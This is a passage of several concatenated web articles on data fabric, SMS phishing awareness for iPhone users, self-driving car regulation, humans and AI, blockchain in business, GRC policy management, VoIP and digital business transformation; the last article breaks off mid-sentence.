storage. This also helps maintain data provenance. It’s not a copy of a data source, but rather a specific data set with a known and accepted state. A data fabric architecture can work with data warehouses and data lakes as well as any other data sources. Benefits of Using Data Fabric Data fabric has three notable benefits, including: - A unified, self-service data source - Automated governance and security - Automated data integration Unified, Self-Service Data Source Data fabric pulls together data from disparate sources into one unified source, which makes discovering, processing, and using data easier. It democratizes data by putting it into the hands of users who need it. Based on access policies and controls, data is accessible to anyone authorized for access. The 2021 Forrester Total Economic Impact, commissioned by IBM, estimates the potential ROI of using a data fabric for a unified, self-service data source at more than 450% providing a benefit to enterprise organizations of $5.8 million. Automated Data Governance and Security Localized governance and security can remain in place. This allows you to ensure specific governance and security rules are followed regardless of where the data is accessed. At the same time, you can also create holistic data management policies for governance and security on an enterprise-wide level. With automated data governance and security rules in place, companies remain in compliance and reduce the risk of data exposure. Automated Data Integration By automating (and augmenting) data integration tasks, data scientists and data engineers can significantly reduce manual workloads. Optimized data integration accelerates data delivery and occurs in real-time so data is always in sync. Why Use Data Fabric? Data fabric helps organizations leverage the power of their accumulated data across a local, hybrid cloud and/or multi-cloud environment. By modernizing storage and data management, a data fabric creates significant efficiencies for business, management, and organizational practices. Data is processed quickly and efficiently with automated pipeline management resulting in significant time savings. Automated pipeline management also allows users to gain a real-time, 360-degree view of their data. For example, whether users want to understand their customers or supply chains better, a data fabric provides a holistic view with access to every data point. Data fabric also create cost-efficiencies by providing a lowered total cost of ownership (TCO) to scale and maintain legacy systems rather than modernizing them incrementally. Data Management Efficiencies Data processing, cleaning, transformation, and enrichment is tedious and repetitive. Automating the data preparation removes much of this burden. A well-designed data fabric architecture also can support significant scale, since data can be stored on-premises, in multi-cloud or hybrid environments. A well designed architecture allows organizations to store data where it is most efficient and cost-effective without sacrificing access. By creating a consistent and common data language allows users to derive greater value. A data fabric creates a semantic abstraction layer that can translate data complexity into easy-to-understand business language. Data is more useful to those without deep data training and experience. Data Fabric Use Cases The most common use case for a data fabric is to create a virtual database for centralized business management. Distributed data sources still maintain accessibility for local or regional use while also being accessible by organizations at large. Organizations that have a distributed workforce or regional segmentation often choose this approach while allowing for central access, coordination, and management of data. Another common use case is when mergers or acquisitions occur. A data fabric strategy can unify disparate sources by bringing the information from the acquired company into the virtual data store without having to replace legacy architecture. While creating unified and harmonized data always requires some level of effort, a data fabric will allow for seamless and centralized data access within and throughout the entire enterprise. Artificial Intelligence and Machine Learning AI relies on robust and high-integrity data, but models are only as good as the data that’s algorithms are being fed. A data fabric architecture provides data scientists with the broad and integrative data they need for efficient data delivery. Since so much of machine learning revolves around the logistics of data, a data fabric provides the best solution to manage data complexity. Implementing a Data Fabric Strategy As remote work, distributed workforces, and digital business channels continue to grow, it creates a complex and diverse data ecosystem. Add in IoT, sensors, and evolving technology that creates data at a blinding rate, and you can easily create an unmanageable mess of data. By using a data fabric layer on top of everything, you can overcome these challenges to bring together various data sources across cloud and location boundaries. Implementing a data fabric strategy allows organizations to modernize without having to disrupt or replace legacy systems. You can unify and access your data virtually whether it lives on-prem, in the cloud, or in hybrid or multi-cloud platforms. Data fabrics provide a holistic view of data, including real-time data, reducing the time required to discover, query, and deploy innovative strategies and providing deeper data analysis that creates better business intelligence. To learn more about data fabric visit our website for more information on how our team can help you.
<urn:uuid:6673f140-12d2-4c12-b5fb-a02d5aa886d2>
CC-MAIN-2022-40
https://convergetp.com/2022/06/16/what-is-a-data-fabric-and-why-do-i-need-it/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00652.warc.gz
en
0.904264
1,582
2.78125
3
A solid-state drive (SSD) is one of the most popular, fastest, and energy-efficient solutions for… By Michael Hall, Chief Information Security Officer If you’re a regular reader of our blog, you are already familiar with phishing emails from an article we posted earlier this year, Don’t Get Caught by Phishing or Other Email Attacks. Phishing is a tactic used by criminals to disguise themselves in a way that makes a victim trust them, and then trick that victim into providing valuable personal information: - Credit card information - Bank account information - Login and password information - Social Security Number - Anything else that might be valuable What you may not realize is that phishing isn’t confined to emails and web browsing. Every day, people are fooled on their phones through spoofed text messages. Spoof messages are sometimes easy to spot, but not always. These fraudulent communications look like they come from a trusted source or someone you know, but they are not what they appear to be. For example, never trust messages that claim to be from your bank that include links or ask for information. Instead of replying with your personal info or going to the link, try calling your bank directly to discuss the content of the text. Use a phone number from your bank card or statement. This security protocol applies to messages from any number you don’t recognize. You should constantly be on guard, especially for some new phishing attempts via iMessages that look authentic, but are actually bogus messages designed to steal your personal or financial information. Here’s an example of a current phishing attempt that iPhone users are receiving via iMessage: This scheme is kind of a tricky one. Aside from the pretty bad fake Apple domain (“appleid.ios-icloud-server.com/us”), it seems like a legitimate message you might get from Apple. However, this is not an authentic communication from Apple. It’s a fake—don’t open it! If you receive a message like this or any other message that you’re not 100% certain about, don’t use the included link. Instead, log into your Apple ID account directly at https://appleid.apple.com/. From there, you can verify all of your logged-in devices. In fact, we would recommend that users do this a few times a year as a matter of habit, just to keep tabs on their devices. If you’d like to make your Apple ID more secure, two-factor authentication is a simple way to do that. Once you have it set up, two-factor verification will be required any time you sign in to manage your Apple ID, sign into iCloud or make an iTunes, iBooks or App Store purchase from a new device. - You enter your password - Apple sends a unique access code to a device that you have previously designated with Apple as a “trusted device” - You enter the access code on the login page As described on the Apple Support website, you can follow the steps below to turn on two-factor authentication. On your iPhone, iPad, or iPod touch with iOS 9 or later: - Go to Settings > iCloud > tap your Apple ID - Tap Password & Security - Tap Turn on Two-Factor Authentication On your Mac with OS X El Capitan or later: - Go to Apple () menu > System Preferences > iCloud > Account Details - Click Security - Click Turn on Two-Factor Authentication Visit Apple’s two-factor authentication support page for more information. If you receive a junk/phishing message on your device, block the sender’s number. Here’s how to do that on an iOS device, like an iPhone or iPad.
<urn:uuid:25cac09b-f452-4416-bb6b-ab64ba3f4774>
CC-MAIN-2022-40
https://drivesaversdatarecovery.com/sms-text-phishing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00652.warc.gz
en
0.88942
800
3.046875
3
Last month, an Uber self-driving car struck and killed pedestrian Elaine Herzberg in Tempe, Arizona. The tragedy highlights the need for a fundamental rethink of the way the federal government regulates car safety. The key issue is this: the current system is built around an assumption that cars will be purchased and owned by customers. But the pioneers of the driverless world—including Waymo, Cruise, and Uber—are not planning to sell cars to the public. Instead, they're planning to build driverless taxi services that customers will buy one ride at a time. This has big implications for the way regulators approach their jobs. Federal car regulations focus on ensuring that a car is safe at the moment it rolls off the assembly line. But as last month's crash makes clear, the safety of a driverless taxi service depends on a lot more than just the physical features of the cars themselves. For example, dash cam footage from last month's Uber crash showed the safety driver looking down at her lap for five agonizing seconds before the fatal crash. Should Uber have done more to train and supervise its safety drivers? Should Uber have continued to put two people in each car, rather than switching to a single driver? Not only are there no federal rules on these questions, at the time of the crash the public was completely in the dark about how Uber and its competitors were dealing with the issue. That was partly because the current administration has a philosophical commitment to minimal regulation. But it's also because the current legal framework—developed under both Democratic and Republican administrations—isn't designed to address this kind of issue. Right now, Congress is considering legislation to exempt tens of thousands of self-driving cars from conventional car safety regulations. It's a reasonable idea. Those regulations really are a poor fit for fully autonomous vehicles, and the technology is changing so fast that any regulations written today are likely to be obsolete in a few years. But in exchange for this regulatory relief, Congress should insist on a lot more scrutiny for the testing and deployment of self-driving cars. Driverless car advocates worry, correctly, that premature regulation could hamper the development of this potentially life-saving technology. But officials could do a lot more to promote transparency and provide oversight without hampering progress. Why conventional regulations don't work for driverless cars Federal car safety regulation has traditionally been based on a thick book of rules called the Federal Motor Vehicle Safety Standards (FMVSS). These regulations, developed over decades, establish detailed performance requirements for every safety-related part of a car: brakes, tires, headlights, mirrors, airbags, and a lot more. Before a car can be introduced into the market, the manufacturer must certify that the vehicle meets all of the requirements in the current version of the FMVSS. A carmaker must certify that the brakes can stop the car within a certain number of feet, that airbags can deploy safely with passengers of various heights, that the tires can run for many hours without overheating, and so forth. Federal regulations don't say much about how companies develop and test cars before bringing them to market. In the era of conventional cars, they didn't need to. Development and testing was generally conducted on private test tracks where they posed no danger to the public. Then car companies would provide the government with documentation that the car met the standards in the FMVSS before putting them on the market. But that approach doesn't work for driverless cars. Companies can do some testing of driverless cars on a closed course, but it's impossible to reproduce a full range of real-world situations in a private facility. So at some point, carmakers need to put self-driving cars on public roads for testing purposes—before a manufacturer is able to clearly demonstrate that they're safe. In effect, this makes the public involuntary participants in a dangerous research project. So far, the approach favored by most driverless car advocates has been for federal officials to simply throw up their hands at this problem. Legislation passed by the House last September, and companion legislation currently stalled in the Senate, would carve out broad exemptions from the FMVSS for driverless cars (the legislation would require manufacturers to submit a "safety report" explaining key safety features of fully self-driving vehicles). Again, there's some logic to this. It's true that some FMVSS requirements don't make sense for fully driverless cars, and it will take years to update the rules. But updating the FMVSS is neither necessary nor sufficient for effective regulation of driverless cars. It's perfectly possible to make an FMVSS-compliant driverless car by starting with a conventional car (which already meets all FMVSS requirements) and adding self-driving gear to it. In fact, Waymo is planning to do exactly that for its Phoenix taxi service with a fleet of Chrysler Pacifica minivans. At the same time, there are many important aspects of running a driverless taxi service that aren't addressed at all by the FMVSS: - Protecting driverless cars from cyberattacks not only depends on the architecture of cars themselves, it also depends on the operational security of the systems used to update the car's onboard software. - Driverless car safety will depend on the accuracy and timeliness of updates to cars' onboard maps. - Companies need a rigorous process for testing safety-critical components on cars in the field and replacing them when they fail. - Companies need a system for thoroughly investigating crashes and other anomalies and updating the car's software to make sure problems don't get repeated. - During the testing phase, safety depends on the training and supervision of safety drivers. - Once the commercial service is launched, safety may depend on the competence of staffers overseeing cars from a remote operations center. - Driverless car companies need plans for dealing with emergency situations and interacting with first responders. Most of these issues aren't covered by the FMVSS—and they probably shouldn't be either. The FMVSS is supposed to focus on objective metrics—like stopping distance—that can be measured in a lab or on a test track. But no numerical measurement can capture how rigorous a company's cybersecurity policies are or how thoroughly a company performs post-crash investigations. Moreover, the technology is so new that it would be a mistake to write detailed regulations on any of these topics now. But what regulators could do is focus on transparency and oversight. If the public is going to share the road with potentially dangerous driverless cars, we should at least have timely and detailed information about how those vehicles are performing and what steps companies are taking to protect public safety.
<urn:uuid:fb66ffec-0951-4a6e-a043-99b69dcd12ec>
CC-MAIN-2022-40
https://arstechnica.com/cars/2018/04/the-way-we-regulate-self-driving-cars-is-broken-heres-how-to-fix-it/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00052.warc.gz
en
0.961951
1,364
2.890625
3
The relationship between humans and AI is something of a dance. We and AI come close together operating collaboratively, then are pushed away by the impossibility, only to stumble but return attracted by the potential. It is perhaps fitting that the dance community is beginning to embrace robots, with AI helping to create new movements and choreography, and with robots sharing the stage with human dancers. The relationship between society and technology is yin and yang, with every massive enhancement accompanied by the potential for danger. AI, for example, offers the promise to end boring, repetitive jobs, enabling us to engage in higher level and more fulfilling tasks. It helps with any number of efficiency efforts, such as fraud detection, and it can even paint masterpiece artworks and compose symphonies. Sam Altman, CEO of OpenAI, hopes AI will unlock human potential and let us focus on the most interesting, most creative, most generative things. Wired co-founder Kevin Kelly has argued that technology, and by extension AI, is a projection of the human mind. The argument is that technology stems organically, authentically, and follows patterns found in man and nature. It is a means by which humans gain control over their environment both for safety but also for advantage. The technology we produce is a natural biological engine of human evolution and a leading cause of change limited only by our imaginations. The positive versus negative polarity of how the technology is applied, the yin and yang, is an expression of the dualistic human mind. However the dichotomy between humans and robots, between natural and artificial does create conflict. The tension between the innate drive to develop and use AI-enabled technology and the potential for it to surpass us creates an understandable emotional turmoil. This stew powers the dance and informs the ongoing industry dialogue about how best to utilize and control AI. In effect, the discussion is about who leads. Today, while AI is mostly still in its infancy, people are in control, but the concerns are about who leads the dance in the future. As AI rapidly develops, the pressure to use it to drive greater advantage grows, as do the existential worries. In “The Master Algorithm,” computer scientist and University of Washington Professor Pedro Domingos assures us that “humans are not a dying twig on the tree of life. On the contrary, we are about to start branching. In the same way that culture coevolved with larger brains, we will coevolve with our creations. We always have: Humans would be physically different if we had not invented fire or spears. We are Homo technicus as much as Homo sapiens.” In this he suggests that humans will always lead, no matter how advanced AI becomes. It is this synergy that underlies a belief in collaboration between humans and machines, a dance pairing with each excelling in ways unique to their strengths. This has given rise to the idea of machines as teammates. The idea is that such collaboration could sustainably augment humans and generate positive benefits for individuals, organizations, and societies. That might work – unless man and machine merge. Philosopher Jason Silva says that AI will change our scope of possibilities in ways we are only starting to glimpse and will lead to a merging between man and machine. Certainly, Elon Musk believes this is both possible and a necessary direction. Though the near-term goal of his Neuralink company and others is to build a brain-computer interface that can help people with specific health conditions, longer-term he has a grander vision. Specifically, he believes this interface will be necessary for humans to keep pace with increasingly powerful AI. Such a development could redefine the relationship between humans and machines, with the merged combination giving rise to a higher form of AI-powered intelligence. In effect, a fusion of the dancers. Among other things, this would also have huge implications for religion. If God created human beings in God’s own image and humans create robots in our image, what does that make them in the eyes of religion? And what does that make a merged creation? Perhaps that is one of the reasons why the Pope recently urged people to pray that robots and artificial intelligence respect the dignity of the person and always serve mankind. Even if there is not this direct physical connection between humans and AI, there is still a growing symbiosis. Researchers are starting to build hybrid collaborative systems that combine the best of an AI model’s superpowers with human intuition. In this, humans contribute leadership, teamwork, creativity, and social skills and machines lead with speed and scalability. A new line of research has a vision of a society in which people are living seamlessly with machines. Though admittedly still some years off, in this vision the AI is merged with an intelligent body to create new types of robots that have properties comparable to those of intelligent living organisms, possibly a step towards creating Replicants with all the implications as imagined by Philip K. Dick in Do Androids Dream of Electric Sheep? that also inspired the Blade Runner movies. This requires what the researchers call Physical AI, combining knowledge from materials science, mechanical engineering, computer science, biology and chemistry. According to a new paper, these robots would be designed to look and behave like humans or other animals and would possess intellectual capabilities normally associated with biological organisms. The goal, according to the paper, is to build robots that could exist like benevolent animals together with nature and people. How might we move towards this higher self – this symbiotic future of natural and artificial? The drive of human imagination, and the onward march of human technology towards what was once science fiction is revealing the possibility of a new dance.
<urn:uuid:71a00bb8-f086-4d19-8419-59ff640482d5>
CC-MAIN-2022-40
https://resources.experfy.com/ai-ml/how-well-merge-with-ai/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00052.warc.gz
en
0.95876
1,153
2.96875
3
Blockchain is a revolutionary technology, which is promising businesses in reducing risk and maintaining data transparency, privacy and security. Blockchain has several opportunities that the business can utilize to improve business processes. Data privacy is highly important and a top concern for any business therefore several of them are trying to use blockchain in their process. Several companies and enterprises are adopting blockchain to improve the overhaul of existing business operations and data handling. Industries such as healthcare, telecom, supply chain, IT are integrating Blockchain to streamline business processes This article will be exploring the impact of Blockchain on business. Blockchain is the 5th ranked technology in the world. Blockchain has brought many changes in financial, healthcare, banking, accounting and other sections irrespective of size, nature and even geographical location. Blockchain is a list of records which is growing and linked using cryptography, a security standard in database management. Each record is known as a block and it is connected with the previous block. Transaction data is time-stamped and secure between two parties since it creates resistance in the modification of data. Blockchain is secure because it is managed by a peer to peer network and blockchain records are not unalterable. Blockchain will improve the industry standards and the structure of global business using digital currencies. According to global experts, the lack of international standards is a big obstruction to worldwide adoption of Blockchain technologies. Industries are reinforcing these necessary standards and transforming small, mid and large size businesses. We have researched and evaluated the following sectors and are significantly implementing this new technology to improve and optimize their operations. Blockchain has made major changes in the financial industry. Financial companies can make faster transactions since it has changed the way of banking services. It provides a way for unknown and untrusted members to satisfy the state of the transaction database without using any middleman. Transactions are now more speedy, secure for consumers and business. Major payment networks, stock exchanges and money transfer services are using Blockchain in reducing transaction fee, and making faster and secure payment transactions. Accounting is a challenging task for any business. Several accounting firms are using blockchain to manage complex tax codes, invoices, bills and income tax files which are in paramount need for accuracy and precision. Accounting professionals use new tools to audit and validate transactions and save time. Rubix is one of the best Blockchain software for accounting. Blockchain could be used in HR and Resource management fields. Hiring professionals can use Blockchain to quickly verify credentials provided by candidates and employees. It can also help in processing inaccurate data and prevent third party companies. MNCs and large organisations where thousands of employees are working across the country need a payroll system. Blockchain-based systems and tools can simplify the payroll and payment transactions in different currencies. WorkChain and Aworker are great automated payroll systems based on Blockchain which offers employees to receive their payable when they complete the work assigned. These platforms are multichain validated data processing platforms that work in peer to peer networks. Asset management is a critical task for any logistics company. Where is the status of material when it is in inventory when it arrived and where would it move? The asset data needs to be accurate and must not be alterable. Giants shipping companies are working on Blockchain systems to track the shipping containers that are roaming in the world. Currently, Blockchain systems are developed by IBM and Digital Asset which would host a chain of data than the traditional asset management tools. Companies that store, manage and ship valuable assets are enabling the Blockchain security standards and records. With the increased business volume, traditional software is not enough to handle records when there are multiple edits and updates. Blockchain will transform this industry. Top management and operations are the most crucial departments of any organisations. Blockchain is helping in streamlining internal operations and reducing friction in sharing business-critical information. Blockchain is allowing management employees to prepare a private and shared ledger with historical versions to maintain the authenticity and transparency of information. This way businesses are implementing a level of trust to achieve the goals and targets. Blockchain is a secure and safe environment for management and operations to share confidential information with other departments in the company and different offices in other countries. Blockchain is building the next generation of contract management. Digital contracts are the bridge between two organisations. Blockchain is providing a new infra to do streamlined business. Start contacts are shared blockchain databases. For example, Accenture has developed a unified solution for businesses to sign blockchain-enabled smart contracts. The contract is secure and can be revised, changed and captures all changes in a ledger. For each change, it generates a notification and is shared with transparency. Blockchain enables all participating parties to have a shared ledger of all activities in the contract. Final contact can be stored in one place and have all recorded versions and activities to maintain its transparency. Contracts are highly usable when two business parties come to meet common conditions and rules to be followed. Smart contracting solutions based on Blockchain technology are improving how businesses process the contracts. Contracts need terms, additional supporting documents, proofs, number of revisions and shared between parties. Blockchain enables technology enabling several advantages to businesses and organizations in signing complex contracts. Blockchain technology has several potentials that can transform the foundation and structure of global industries. International industries will significantly adopt this new technology and this revolution will change the scenario in data handling, security and records management. Business must need to follow the innovation. Blockchain and digital currencies will make business processes faster, secure and efficient to build a strong economy.
<urn:uuid:95df88a5-d6fe-48ff-ad9c-19e6ee4e0193>
CC-MAIN-2022-40
https://resources.experfy.com/fintech/how-blockchain-technology-is-transforming-the-business/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00052.warc.gz
en
0.941498
1,101
2.53125
3
The Foundational Role of Policies in GRC Strategies Policies are critical to the organization as they establish boundaries of behavior for individuals, processes, relationships, and transactions. Starting at the policy of all policies – the code of conduct – they filter down to govern the enterprise, divisions/regions, business units, and processes. GRC, by definition, is “a capability to reliably achieve objectives [governance] while addressing uncertainty [risk management] and acting with integrity [compliance].” Policies are a critical foundation of GRC. When properly managed, communicated, and enforced policies: - Provide a framework of governance. Policy paints a picture of behavior, values, and ethics that define the culture and expected behavior of the organization; without policy there is no consistent rules and the organization goes in every direction. - Identify and treat risk. The existence of a policy means a risk has been identified and is of enough significance to have a formal policy written which details controls to manage the risk. - Define compliance. Policies document compliance in how the organization meets requirements and obligations from regulators, contracts, and voluntary commitments. Unfortunately, most organizations do not connect the idea of policy to the establishment of corporate culture. Without policy, there is no written standard for acceptable and unacceptable conduct — an organization can quickly become something it never intended. Policy also attaches a legal duty of care to the organization and cannot be approached haphazardly. Mismanagement of policy can introduce liability and exposure, and noncompliant policies can and will be used against the organization in legal (both criminal and civil) and regulatory proceedings. Regulators, prosecuting and plaintiff attorneys, and others use policy violation and noncompliance to place culpability. An organization must establish policy it is willing to enforce — but it also must clearly train and communicate the policy to make sure that individuals understand what is expected of them. An organization can have a corrupt and convoluted culture with good policy in place, though it cannot achieve strong and established culture without good policy and training on policy. Hordes of Policies Scattered Across the Organization Policies matter. However, when you look at the typical organization you would think policies are irrelevant and a nuisance. The typical organization has: - Policies managed in documents and fileshares. Policies are haphazardly managed as document files and dispersed on a number of fileshares, websites, local hard drives, and mobile devices. The organization has not fully embraced centralized online publishing and universal access to policies and procedures. There is no single place where an individual can see all the policies in the organization and those that apply to specific roles. - Reactive and inefficient policy programs. Organizations often lack any coordinated policy training and communication program. Instead, different departments go about developing and communicating their training without thought for the bigger picture and alignment with other areas. - Policies that do not adhere to a consistent style. The typical organization has policy that does not conform to a corporate style guide and standard template that would require policies to be presented clearly (e.g., active voice, concise language, and eighth-grade reading level). - Rogue policies. Anyone can create a document and call it a policy. As policies establish a legal duty of care, organizations face misaligned policies, exposure, liability, and other rogue policies that were never authorized. - Out of date policies. In most cases, published policy is not reviewed and maintained on a regular basis. In fact, most organizations have policies that have not been reviewed in years for applicability, appropriateness, and effectiveness. The typical organization has policies and procedures without a defined owner to make sure they are managed and current. - Policies without lifecycle management. Many organizations maintain an ad hoc approach to writing, approving, and maintaining policy. They have no system for managing policy workflow, tasks, versions, approvals, and maintenance. - Policies that do not map to exceptions or incidents. Often organizations are missing an established system to document and manage policy exceptions, incidents, issues, and investigations to policy. The organization has no information about where policy is breaking down, and how it can be addressed. - Policies that fail to cross-reference standards, rules, or regulations. The typical organization has no historical or auditable record of policies that address legal, regulatory, or contractual requirements. Validating compliance to auditors, regulators, or other stakeholders becomes a time-consuming, labor-intensive, and error-prone process. Inevitable Failure of Policy Management Organizations often lack a coordinated enterprise strategy for policy development, maintenance, communication, attestation, and training. An ad hoc approach to policy management exposes the organization to significant liability. This liability is intensified by the fact that today’s compliance programs affect every person involved with supporting the business, including internal employees and third parties. To defend itself, the organization must be able to show a detailed history of what policy was in effect, how it was communicated, who read it, who was trained on it, who attested to it, what exceptions were granted, and how policy violation and resolution was monitored and managed. If policies do not conform to an orderly style and structure, use more than one set of vocabulary, are located in different places, and do not offer a mechanism to gain clarity and support (e.g., a policy helpline), organizations are not positioned to drive desired behaviors in corporate culture or enforce accountability. With today’s complex business operations, global expansion, and the ever changing legal, regulatory, and compliance environments, a well-defined policy management program is vital to enable an organization to effectively develop and maintain the wide gamut of policies it needs to govern with integrity. The bottom line: The haphazard department and document centric approaches for policy management of the past compound the problem and do not solve it. It is time for organizations to step back and define and approach policy management with a strategy and architecture to manage the ecosystem of policies programs throughout the organization with real-time information about policy conformance and how it impacts the organization. Check out GRD 20/20’s additional policy management resources . . . - This is a complimentary full day interactive workshop to help organizations define a policy management strategy, write a policy on writing policies (meta-policy), define a policy management lifecycle, understand the role of technology in policy management, and build a business case for policy management. This workshop is only open to individuals managing policies in their internal environment and is not open to solution providers or consultants. Research Briefing: How to Purchase Policy Management Solutions & Platforms - This is GRC 20/20’s on-demand Research Briefing that advises organizations on what to consider in evaluating and selecting policy management solutions and technologies. It reviews critical capabilities needed in policy management technology as well as what differentiates a basic, common, and advanced solution in the market. Particular guidance is given into considerations when engaging solution providers and navigating solution provider hyperbole. - The challenge is: how do you find the right policy management solution for your organization? This is where GRC 20/20 comes in. If you are looking for policy management solutions for various purposes, GRC 20/20 Research offers complimentary inquiries to explore your needs and identify a short list of solutions that best fit your specific needs. Simply register an inquiry on the GRC 20/20 website. RFP Template & Support: Policy Management RFP Requirements Template - GRC 20/20 can be engaged on policy management RFP projects to rapidly enable organizations to develop RFPs based on our policy management RFP criteria library. Simply email [email protected] and we can scope your needs for a RFP criteria project. GRC 20/20 is often engaged in more detailed RFP projects to help manage the RFP and keep solution providers honest based on our broad experience in the market. Written Research on Policy Management - Case Study: Claims Recovery Financial Services: Value Achieved in Policy Management - Solution Perspective: RegEd CODE: Enabling an Integrated Compliance Lifecycle
<urn:uuid:f8194b7e-84d3-41a8-9753-5d5906686f8b>
CC-MAIN-2022-40
https://grc2020.com/2016/10/04/policy-management-demands-attention/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00052.warc.gz
en
0.935475
1,651
2.53125
3
Voice over IP (VoIP) is a technology that allows voice traffic to be transmitted over a data network, such as the public internet. Using VoIP and, usually in conjunction with a broadband internet connection (cable modem or DSL), it is possible to use a wide range of equipment to make telephone calls over the net. Using an adapter, or a special IP Phone (Phone-to-Phone) or software (PC-to-Phone) the voice signal from your telephone or PC is converted into a digital signal (data packet) that travels over the internet and then converts the signal back at the other end so you can speak to anyone in the world with a regular phone number. When placing a VoIP call using a phone with an adapter, you'll hear a dial tone and you dial just as you always have. VoIP may also allow you to make a call directly from a computer using a conventional telephone, a USB phone or a headset with a microphone. Learn more about VoIP: - Read VoIP Articles and News - Seach for VoIP Providers - Compare VoIP Providers Rank VoIP Providers(according to international VoIP rates) - Review VoIP Providers (in our VoIP Directory) - Ask questions and find answers in our VoIP Forum - Find suitable VoIP Hardware
<urn:uuid:8d0c9658-a255-4654-8a46-615719652dcc>
CC-MAIN-2022-40
https://www.myvoipprovider.com/en/FAQs/VoIP_FAQs/What_is_Voice_over_IP
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00052.warc.gz
en
0.861724
293
3.234375
3
It’s easy to argue that today’s information technologies accelerate the speed at which enterprises make decisions, process information, and collaborate to solve problems. But do they provide any competitive advantages? The pace of collaboration, problem solving, innovation, and value creation has been increasing as new enabling tools emerge, resulting in a cycle in which innovation leads to new inventions. For example, the development of knowledge bases presented an innovative way to collaborate, which in turn lead to inventions in many fields.(1) Some might assume that this process creates an advantage, but in reality, almost everyone else is developing these tools at the same time. New capabilities are evolving in the context of an eco-system of competitors, all of whom are trying to do the same thing. The key is to leverage new tools and approaches faster than others in your industry, creating differentiated value for the customer. Overcoming the Productivity Paradox One challenge is that there’s an increasing level of overhead involved with these tools and infrastructure. While adding capability and improving the ability to collaborate and solve problems, technologies are also adding complexity and reducing productivity in some contexts. This well-known productivity paradox isn’t really a paradox at all. Since economist Robert Solow made this statement back in 1987, referring to a lack of evidence of productivity increases from computer technology,(2) several explanations have been presented. These include issues related to how productivity is measured, how the technology is implemented and managed, the lag between technology investment and benefits realization, and the phenomenon of differentiated advantages across competitors (the “redistribution of profits”).2 Innovative approaches for applying new technology can have a significant impact on the enterprise or institution. If competitors can take advantage of a shift in technology use faster than you can, it puts your market share at risk. For example, a large book publisher gained a sizable share of the K-12 market after adopting component authoring.(3) The new approach helped the publisher better adapt to changing curricula standards to develop textbooks that accommodated such standards, which varied by grade, subject matter, and school district. The company developed taxonomies and metadata for a repository containing more than one million content components, which an editor could use to begin the development process as standards were updated. This reduced the time to market by six months. By the time others realized there was a new process in use, the publisher had a three-year advantage in the marketplace, having already transformed its internal processes and developed competencies. So how can you exploit new technology to stay ahead of the competition? The challenge isn’t just to recognize innovative technology but also to apply it to your existing business model. In some cases, this requires breaking the business model and coming up with an entirely new way of doing business. Much of the maturity that’s required to leverage technology for a competitive advantage relates more to the people and business processes than to the complexity of the application. Organizations must transform how they do business—they can’t just use the same old approaches with new software. Transforming the Business Transformation requires a strong leader who has developed an achievable vision only after exploring issues and challenges at the front lines of the business and understanding how technology can create order-of-magnitude, not just incremental, improvements when solving problems. This vision is about the digital experience—regardless of whether it’s for internal or external users. Understanding the Digital Experience The era we live in no longer tolerates disruptions caused by some-one accessing a computer in a call center to answer your question. Similarly, being transferred between departments because of siloed processes causes frustration and loss of good will. Users have higher expectations for Web experiences and internal information system capabilities. They expect intuitive access to a wide range of information sources as they go about their day-to-day tasks. Shoppers want to find products with minimal effort. They also want you to offer choices that directly support their tasks and present reviews and recommendations from their peers. The digital experience must tailor content and functionality to the user’s current need. All of this is data driven. It requires having a richer under-standing of users and their needs, modeling the data to represent those users and needs, and measuring the results using multiple data streams. Whether organizations create a tailored Web experience, a personalized interface to an intranet with content adapted based on the user’s role in the organization, or a custom search experience based on the user’s task and interest, the same mechanisms apply— modeling the user, modeling the information he or she seeks, and developing mechanisms that can serve that information depending on a particular set of circumstances. Doing so means changing how information is created, structured, organized, curated, managed, and integrated across systems, processes, and department siloes. The larger the organization, the more challenging this becomes. Providing a seamless, contextually relevant, digital experience requires changing deeply entrenched organizational habits. Implementing such changes entails a long-term commitment to goals consistent with the organization’s vision. Presenting Context-Driven Data This evolution requires bringing to the surface knowledge of the customer, which has been embedded in institutional memory, so that it can be systematically exploited through multiple touch points and channels. For example, in an engineering-focused manufacturing organization that sells to other manufacturers, the expertise that the customer wants to access is mostly in the minds of company engineers. In a small firm, you might pick up the phone or have a face-to-face meeting to capture such expertise, but as the volume of knowledge grows, technology is needed to transfer the knowledge to the customer. However, effective capture and presentation of expertise requires more than just installing Web content management software. You need a mechanism for capturing the knowledge upstream and curating it through a managed process that applies a selective filter, so you’re only presenting information as it’s needed by the customer. In a consumer context, this might require harmonizing your understanding of the customer across a customer relationship management system, a website content management system, automated marketing or email systems, and ecommerce engines. In a system-siloed world, different departments would be behind these systems, which would be from different software providers or a combination of custom, off-the-shelf, and home-grown tools with inconsistent architectures and different models of the customer. Each system would have a different “schema” or set of attributes and descriptors. Although some standards might be observed, each product would consider different attributes about the customer and have different data-sets, interpreted differently based on the system view. Therefore, the information provided by that application would paint a different picture with different parameters about who the customer is. These different data streams must be interpreted and, oftentimes, normalized—that is, different terms describing the same concept must be translated to a preferred, common term across systems to allow for analysis. Exploiting Big Data With more data sources, organizations have more mechanisms to provide input to develop user attributes. You can divide and subdivide users into many different categories, depending on the context. So you might start with “women between 30 and 35 who are Yoga enthusiasts and professionals,” but then you could add “who work in the media and entertainment industry, drive foreign-brand luxury cars and own Apple computers, are interested in green products…” and so on. You can add descriptors to data that will allow more slicing and dicing and, in combination with other data, allow for new insights. These details will reveal opportunities to address unmet needs or to outperform a competitor. The very fact of discovering patterns in the data means that something of value exists—once those attributes can be aligned, the organization’s value proposition increases. Having more data sources means that the potential combinations expand exponentially. You can combine demographic profiles with Facebook and social media patterns. Mobile applications that leverage geofencing—the ability to track users’ proximity to physical points of interest—allow for unprecedented mining of user characteristics and attributes. Organizations must continue to get better at managing information as a strategic asset—and not just focusing on the obviously high-value content of sources such 